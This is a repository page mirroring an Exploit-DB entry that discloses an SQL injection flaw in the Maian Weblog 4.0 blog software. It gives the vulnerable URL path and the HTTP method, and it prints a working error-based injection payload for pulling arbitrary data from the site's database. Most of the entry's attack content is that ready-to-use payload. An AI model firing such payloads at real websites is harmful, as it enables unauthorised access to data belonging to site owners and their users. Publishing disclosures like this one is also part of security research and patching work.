bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/41178.txt
Offensive Security 2b017ecadf DB: 2017-01-28 
6 new exploits

Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow
My Photo Gallery 1.0 - SQL Injection
Maian Weblog 4.0 - SQL Injection
WordPress Plugin WP Private Messages 1.0.1 - SQL Injection
Online Hotel Booking System Pro 1.2 - SQL Injection
WordPress Plugin Online Hotel Booking System Pro 1.0 - SQL Injection
2017-01-28 05:01:17 +00:00

26 lines
1.1 KiB
Text
Executable file
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

Introduction
Exploit Title: Maian Weblog SQL Injection
Date: 27.01.2017
Vendor Homepage: http://www.maianweblog.com/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Simple blog system for your website, Easily add/edit or delete blogs, Allow visitor comments for individual blogs, Optional e-mail notification for webmaster if comments are posted, Edit or delete visitor comments, BB Code, Calendar so visitors can view past archives, Support for multi language files, Show latest blogs/comments on blog page, Uses the Savant template engine.
Type of vulnerability:
An SQL Injection vulnerability in Maian Weblog allows attackers to read
arbitrary data from the database.
Vulnerable Url:
http://locahost/weblog/blog/2[payload]/second-blog.html
Mehod : GET
Simple Payload:
blog/2' AND (SELECT 2995 FROM(SELECT COUNT(*),CONCAT(0x71717a6a71,(SELECT (ELT(2995=2995,1))),0x717a787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'AUvx'='AUvx/q-blog.html
Reference in a new issue View git blame Copy permalink